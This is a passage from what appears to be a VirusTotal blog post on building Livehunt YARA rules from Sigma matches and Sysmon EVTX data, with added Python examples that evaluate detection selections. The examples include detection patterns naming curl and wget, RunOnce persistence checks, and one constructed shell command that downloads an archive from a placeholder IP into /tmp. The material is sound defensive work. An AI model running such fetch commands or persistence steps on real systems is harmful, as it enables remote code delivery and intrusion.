<div class="interval_12"> In this case, the <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" target="_blank">Usage Of Web Request Commands And Cmdlets</a> rule was originally created to detect web requests made from the Windows command line:
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/M5l7N9cJ_zdbuR-MthKBo19qxAcOfCFc2WsKIX4r7G6BVPRJsnhPrqaNxWtyuXmw2r57sc6lDsTtKi0FehS79GM-dN5E5ZYf9ePC_topnL7foWDDZ80kbnRax1seDc6D1iZeBmhtJMQE3wtFVAAFTUG9xydgYY6pIockMd9fLgn7ZrvbZSf1QcmXyShOdi3Eh-uS5OaACCiRnxXwdXXy8MAAuboqpfdVZJB2fQ" width="800" /></div>
<div class="interval_12"> The rule is arguably too generic, since it only checks for a few strings in the command line; on the other hand, that is precisely what makes it highly effective as a broad detection of suspicious behavior.
</div>
<div class="interval_12"> To understand why our Macintosh Disk Image sample triggered a detection for this rule, we checked the matches:
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/Gzxk4mCCV0uJ4gyiwoQzIPqsscuWfDyu9CCoNhDuviiC-1zJNh4EyM_EJZq4y27OHUeiUMgf35MmPnMTGZwaYPmPC1VDaY2uzH1QHFb3XqXXTb20RY7Zl3RB_hw-GZqtnUfXP63Soq_RaWI8Wjnplq6z5yT8QWuWSg7B5YVVFbSxJx7GvTuT7uAp4UEzxnGkVYNtSXf_Mo5MKb2Ps-VCCpsDF5nvbL9dcKE3Gw" width="800" /></div>
<div class="interval_12"> As we can see, the presence of the string <mark class="my-yara-code"><mark class="red">“curl”</mark></mark> in the command line was enough to match this sample.
</div>
<div class="interval_12"> This Sigma rule had about 9k hits in the last year alone, more than 300 of them on Linux or macOS samples. You can obtain the full list with the following query:
</div>
<div class="my-yara-code interval_12"><mark class="red">sigma_rule</mark>:f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8 and (<mark class="red">type</mark>:linux or <mark class="red">type</mark>:mac)</div>
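<div class="interval_12">The crontab rule shown earlier and the “curl” case just discussed both come down to how a process_creation selection is evaluated against a sandbox process record. The Python below is an added example, not VirusTotal's implementation: it evaluates Sigma-style selections (contains, startswith, endswith; list values OR-ed; keys AND-ed; case-insensitive) over constructed Linux/macOS process events, and compares a deliberately generic web-request selection (constructed for the illustration, not the SigmaHQ rule's actual content) with a tighter variant. The mapping from sandbox fields to Image and CommandLine is an assumption.</div>

```python
# Added example (not VirusTotal's code): a minimal evaluator for Sigma
# process_creation selections, run over constructed sandbox process events for
# Linux/macOS. It shows how sandbox records map onto Sigma's Image/CommandLine
# fields and why a selection made of a few command-line substrings fires broadly.

from typing import Any, Dict, List, Optional


def _match_value(field_value: str, modifier: Optional[str], pattern: str) -> bool:
    """Sigma string matching is case-insensitive; support the common modifiers."""
    fv, p = field_value.lower(), pattern.lower()
    if modifier is None:
        return fv == p
    if modifier == "contains":
        return p in fv
    if modifier == "endswith":
        return fv.endswith(p)
    if modifier == "startswith":
        return fv.startswith(p)
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(selection: Dict[str, Any], event: Dict[str, str]) -> bool:
    """Every key in a selection must match (AND); a list of values is OR-ed, per Sigma."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        if value is None:
            return False
        patterns = patterns if isinstance(patterns, list) else [patterns]
        if not any(_match_value(value, modifier or None, str(p)) for p in patterns):
            return False
    return True


def sandbox_event(image: str, argv: List[str]) -> Dict[str, str]:
    """Assumed mapping from a sandbox process-creation record to Sigma fields."""
    return {"Image": image, "CommandLine": " ".join(argv)}


# The crontab rule from the post, reduced to its selection.
CRONTAB_LIST = {"Image|endswith": "/crontab", "CommandLine|contains": " -l"}

# Constructed, deliberately generic selection in the spirit of the web-request
# rule discussed in the post (NOT the SigmaHQ rule's actual content).
WEB_REQUEST_GENERIC = {"CommandLine|contains": ["curl", "wget", "Invoke-WebRequest"]}

# A tighter variant: same tools, but only when driven from a shell and with an
# explicit remote scheme, which is a more deliberate fetch than a bare "curl".
WEB_REQUEST_TIGHTER = {
    "Image|endswith": ["/sh", "/bash", "/zsh"],
    "CommandLine|contains": ["curl http", "wget http"],
}

RULES = {
    "crontab_list": CRONTAB_LIST,
    "web_request_generic": WEB_REQUEST_GENERIC,
    "web_request_tighter": WEB_REQUEST_TIGHTER,
}

# Constructed sandbox process events (not real detonation output).
EVENTS = {
    "list_cron": sandbox_event("/usr/bin/crontab", ["crontab", "-l"]),
    "edit_cron": sandbox_event("/usr/bin/crontab", ["crontab", "-e"]),
    "pkg_fetch": sandbox_event("/usr/bin/curl",
                               ["curl", "-fsSL", "https://example.test/pkg.tgz"]),
    "sh_fetch": sandbox_event("/bin/sh",
                              ["sh", "-c", "curl http://203.0.113.5/agent.tgz -o /tmp/agent.tgz"]),
}


def evaluate(rules: Dict[str, Dict[str, Any]],
             events: Dict[str, Dict[str, str]]) -> Dict[str, List[str]]:
    """Return {rule_name: [names of events that matched]} for reporting."""
    return {name: [e for e, ev in events.items() if selection_matches(sel, ev)]
            for name, sel in rules.items()}


if __name__ == "__main__":
    for rule, hits in evaluate(RULES, EVENTS).items():
        print(f"{rule}: {hits}")
```

<div class="interval_12">The output makes the post's point concrete: the generic selection fires on an ordinary package download as well as on the shell-driven fetch, while requiring a shell parent and an explicit scheme keeps the second and drops the first. Whether that narrowing is desirable depends on the rule's intent, exactly as the post notes.</div>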
<h2 style="text-align: left;">Creating Livehunt rules from Sysmon EVTX outputs</h2>
<div class="interval_12"> So far we have mainly focused on samples that do not have Sysmon (EVTX) logs. Now let's see how to create a Livehunt rule based on Sysmon logs. For this, we use the “structure” functionality of the Livehunt YARA editor, which we explained in this <a href="https://blog.virustotal.com/2023/09/its-all-about-structure-creating-yara.html" target="_blank">post</a>.
</div>
<div class="interval_12"> The <a href="https://www.virustotal.com/gui/file/75f32ab1a2e666ca53d9d8e3d9d6d7e64ee068aa92af66bdd1e4f6527e83e1ec" target="_blank">sample</a> we will use in this example is associated with CobaltStrike and matches multiple Sigma rules that identify certain behaviors. It is important to note that for every Sigma match, the file “structure” shows the context <b>that matched</b> but not the full EVTX logs. These can be downloaded from the behavior section of the sample’s VT report under “Download Artifacts”, or through our API (available for <a href="https://docs.virustotal.com/reference/file-behaviour-evtx" target="_blank">public</a> and <a href="https://docs.virustotal.com/reference/file_behaviourssandbox_idevtx" target="_blank">privately</a> scanned files).
</div>
<div class="interval_12"> The following image shows the matching raw EVTX generated by our sample:
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/04pqw6oXn8r_d-13nYXDumqEUwjtBKraV6WDXV7YV4zD00ZYiUJ5pgwkCrMi00IiIo1aOxmt7mbi3E6xWoJkz-FMlQOHAdA42xCrPoEWLfjFwmOkgz8D5poXj8J5eXXBSYSesDNd7YvxyA0ffV7oA3RbGoiOOSAZ7YY5_ZvXLWBVXvEyErLBcc3XSW0TU4GP7OLnwclWMRERkotJzwSC0iZO-X2SdaGz7yUgFA" width="800" /></div>
<div class="interval_12"> In the sample’s JSON structure, <b>sigma_analysis_results</b> is an array of objects holding all the relevant information about the matching Sigma rules, including details about the rule itself and the EVTX logs. In the previous image, the first highlighted section is related to process creation and the second one is a registry event (value set).
</div>
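<div class="interval_12">To make the shape of that array explicit, here is an added Python walk over a constructed object with the same layout (illustration code, not VirusTotal's, and the constructed report is not a real sample). It applies the check the post goes on to build as a Livehunt rule: any Sigma match context whose TargetObject lies under \CurrentVersion\RunOnce\ and references a .bat or .vbs script. The field names rule_title and Details, and the decision to test the extension on both the value name and its data, are assumptions.</div>

```python
# Added example (not VirusTotal's code): walk a constructed object shaped like the
# sigma_analysis_results array and flag RunOnce persistence entries that point at
# .bat/.vbs scripts, the same check the post expresses as a Livehunt rule.
# Field names other than sigma_analysis_results, match_context, values and
# TargetObject are assumptions made for the illustration.

from typing import Any, Dict, List, Tuple

RUNONCE_FRAGMENT = "\\currentversion\\runonce\\"   # compared case-insensitively
SCRIPT_EXTENSIONS = (".bat", ".vbs")

# Constructed sample report (not real VT output).
SAMPLE_STRUCTURE: Dict[str, Any] = {
    "sigma_analysis_results": [
        {
            "rule_title": "Constructed: process creation rule",
            "match_context": [
                {"values": {"Image": "C:\\Windows\\System32\\cmd.exe",
                            "CommandLine": "cmd.exe /c start.bat"}}
            ],
        },
        {
            "rule_title": "Constructed: RunOnce registry rule",
            "match_context": [
                # value name is plain, the data names a .bat script
                {"values": {"TargetObject": "HKU\\S-1-5-21-0-0-0-1001\\Software\\Microsoft"
                                            "\\Windows\\CurrentVersion\\RunOnce\\update",
                            "Details": "C:\\Users\\Public\\update.bat"}},
                # value name itself ends in .vbs
                {"values": {"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows"
                                            "\\CurrentVersion\\RunOnce\\loader.vbs",
                            "Details": "wscript.exe C:\\Users\\Public\\loader.vbs"}},
                # RunOnce entry that is not a script: must not be flagged
                {"values": {"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows"
                                            "\\CurrentVersion\\RunOnce\\cleanup",
                            "Details": "C:\\Program Files\\Vendor\\cleanup.exe"}},
            ],
        },
    ]
}


def runonce_script_hits(structure: Dict[str, Any]) -> List[Tuple[str, str]]:
    """Return (rule_title, TargetObject) for every match context that meets the check."""
    hits: List[Tuple[str, str]] = []
    for result in structure.get("sigma_analysis_results", []):
        title = result.get("rule_title", "<untitled>")
        for ctx in result.get("match_context", []):
            values = ctx.get("values", {})
            target = values.get("TargetObject", "")
            details = values.get("Details", "")
            if RUNONCE_FRAGMENT not in target.lower():
                continue
            # Assumption: the script extension may sit on the value name or on its data.
            if any(s.lower().endswith(SCRIPT_EXTENSIONS) for s in (target, details)):
                hits.append((title, target))
    return hits


def structure_matches(structure: Dict[str, Any]) -> bool:
    """Python equivalent of the rule's nested 'for any ... : ( ... )' condition."""
    return bool(runonce_script_hits(structure))


if __name__ == "__main__":
    for title, target in runonce_script_hits(SAMPLE_STRUCTURE):
        print(f"{title}: {target}")
```

<div class="interval_12">structure_matches is the boolean the Livehunt rule would yield for the file, while runonce_script_hits keeps the rule title and registry path so the result can be triaged.</div>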
<div class="interval_12"> As explained in our <a href="https://blog.virustotal.com/2023/09/its-all-about-structure-creating-yara.html" target="_blank">post</a>, simply clicking on the fields you are interested in lets you start building your <a href="https://support.virustotal.com/hc/en-us/articles/360001315437-Livehunt" target="_blank">Livehunt</a> rule, adjusting values as needed. In this case, our rule will identify files creating registry keys under <mark class="my-yara-code"><mark class="red">\\CurrentVersion\\RunOnce\\</mark></mark> with a <mark class="my-yara-code"><mark class="red">.bat</mark></mark> or <mark class="my-yara-code"><mark class="red">.vbs</mark></mark> extension:
</div>
<div class="my-yara-code interval_12" style="text-align: left;">
<p>import "vt"</p>
<p>&nbsp;</p>
<p>rule sigma_example_registry_keys {</p>
<p>&nbsp;&nbsp;meta:</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;target_entity = "file"</p>
<p>&nbsp;&nbsp;condition:</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;for any vt_behaviour_sigma_analysis_results in vt.behaviour.sigma_analysis_results: (</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for any vt_behaviour_sigma_analysis_results_match_context in vt_behaviour_sigma_analysis_results.match_context: (</p>
<p dir="ltr">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;vt_behaviour_sigma_analysis_results_match_context.values["TargetObject"] icontains "\\CurrentVersion\\RunOnce\\"<span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">and</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">(</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt_behaviour_sigma_analysis_results_match_context.values</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">[</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"Details"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">]</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">endswith</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">".vbs"</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">or</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results_match_context.values</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">[</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"Details"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">]</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">endswith</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">".bat"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">}</span>
</p></div>
<div class="interval_12"> Running this YARA rule as a <a href="https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt" target="_blank">Retrohunt</a> returns multiple files:
</div>
<div class="interval_12"> Here you can see some interesting matches:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/sZLZhAfbKUNhk9RujX-DtJkb9Kg9yFT85fYEcpeyX1fdnglquAV0b8uZv8p4SodmKDpZjUEBp16rEV8ALiwRFYsewYdOBqKuA3b_5dcn9e1fMvHnYZLknfiOPrQ6G81-4408Huvi6-STzDJyC47X5IUuioFoMxljA8CN5dDaz0na3rnpyIM6Stz0aBHIgkJfuVEFe2rZGUCptk5k3KxWyD6DaNAmq6ZV62Efzw" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
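<div class="interval_12"> To triage Retrohunt results offline, the same conditions (the RunOnce persistence rule above and the System32 “.dll” rule described next) can be re-evaluated over VirusTotal API file objects. This is an added Python example, not VirusTotal’s code; it assumes the API JSON layout attributes.sigma_analysis_results[].match_context[].values and attributes.tags, and every sample object below is constructed.
</div>

```python
"""Re-evaluate the post's two VT Hunting conditions over API file objects.

Added example, not VirusTotal code.  Assumption: Sigma matches live under
attributes.sigma_analysis_results[].match_context[].values and sample tags
under attributes.tags, as in the VirusTotal API file object.
"""
import json
from typing import Callable, Dict, Iterator, List

Predicate = Callable[[dict, Dict[str, str]], bool]

# Constructed sample objects (not real VirusTotal data).
SAMPLE_RESPONSE = json.dumps({"data": [
    {   # RunOnce value pointing at a .vbs: should satisfy the RunOnce rule
        "id": "constructed-sample-1",
        "attributes": {
            "tags": ["peexe"],
            "sigma_analysis_results": [{
                "rule_title": "constructed: registry persistence",
                "match_context": [{"values": {
                    "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\upd",
                    "Details": "C:\\Users\\Public\\upd.vbs",
                }}],
            }],
        },
    },
    {   # RunOnce value pointing at an .exe: the .vbs/.bat filter must reject it
        "id": "constructed-sample-2",
        "attributes": {
            "tags": ["peexe"],
            "sigma_analysis_results": [{
                "rule_title": "constructed: registry persistence",
                "match_context": [{"values": {
                    "TargetObject": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\svc",
                    "Details": "C:\\ProgramData\\svc.exe",
                }}],
            }],
        },
    },
    {   # .dll written under System32 and a "cve-" tag: should satisfy the second rule
        "id": "constructed-sample-3",
        "attributes": {
            "tags": ["peexe", "cve-0000-0000"],  # placeholder tag, not a real CVE id
            "sigma_analysis_results": [{
                "rule_title": "constructed: file creation in System32",
                "match_context": [{"values": {
                    "TargetFilename": "C:\\Windows\\System32\\helper.dll",
                }}],
            }],
        },
    },
    {   # same drop but the sample carries no "cve-" tag: must be rejected
        "id": "constructed-sample-4",
        "attributes": {
            "tags": ["peexe"],
            "sigma_analysis_results": [{
                "rule_title": "constructed: file creation in System32",
                "match_context": [{"values": {
                    "TargetFilename": "C:\\Windows\\System32\\helper.dll",
                }}],
            }],
        },
    },
]})


def match_contexts(file_obj: dict) -> Iterator[Dict[str, str]]:
    """Yield the EVTX-style field dictionary of every Sigma match of one file."""
    for result in file_obj.get("attributes", {}).get("sigma_analysis_results", []):
        for ctx in result.get("match_context", []):
            yield ctx.get("values", {})


def runonce_script_persistence(file_obj: dict, values: Dict[str, str]) -> bool:
    """TargetObject icontains '\\CurrentVersion\\RunOnce\\' and Details ends with .vbs or .bat."""
    target = values.get("TargetObject", "")
    details = values.get("Details", "")
    # YARA's icontains is case-insensitive, endswith is case-sensitive; mirror both.
    return ("\\currentversion\\runonce\\" in target.lower()
            and (details.endswith(".vbs") or details.endswith(".bat")))


def system32_dll_with_cve_tag(file_obj: dict, values: Dict[str, str]) -> bool:
    """A .dll created under C:\\Windows\\System32\\ by a sample whose tags icontain 'cve-'."""
    name = values.get("TargetFilename", "")
    tags = file_obj.get("attributes", {}).get("tags", [])
    return (name.startswith("C:\\Windows\\System32\\")
            and name.endswith(".dll")
            and any("cve-" in tag.lower() for tag in tags))


def hunt(file_objs: List[dict], predicate: Predicate) -> List[str]:
    """IDs of files where at least one match context satisfies the predicate ('for any ... : (...)')."""
    return [obj["id"] for obj in file_objs
            if any(predicate(obj, values) for values in match_contexts(obj))]


def hunt_response(response_json: str, predicate: Predicate) -> List[str]:
    """Run a predicate over the 'data' list of an API response body."""
    return hunt(json.loads(response_json).get("data", []), predicate)


if __name__ == "__main__":
    for pred in (runonce_script_persistence, system32_dll_with_cve_tag):
        print(pred.__name__, hunt_response(SAMPLE_RESPONSE, pred))
```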
<div class="interval_12"> The next rule focuses on Sysmon file creation events (Event ID 11) that write a file with a “.dll” extension under the “C:\Windows\System32” directory, from a sample carrying any “cve” tag (flagging potential exploitation of a known CVE). Remember that, in addition to EVTX fields, we can always combine any other attribute of the samples we want to hunt, such as positives, metadata, tags, engines, …:
</div>
<div class="my-yara-code interval_12"><p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">import</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"vt"</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">rule</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
sigma_rule_evtx_cve </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">{</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">meta</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">:</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> target_entity
= </span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"file"</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">condition</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">:</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">for</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">any</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">in</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
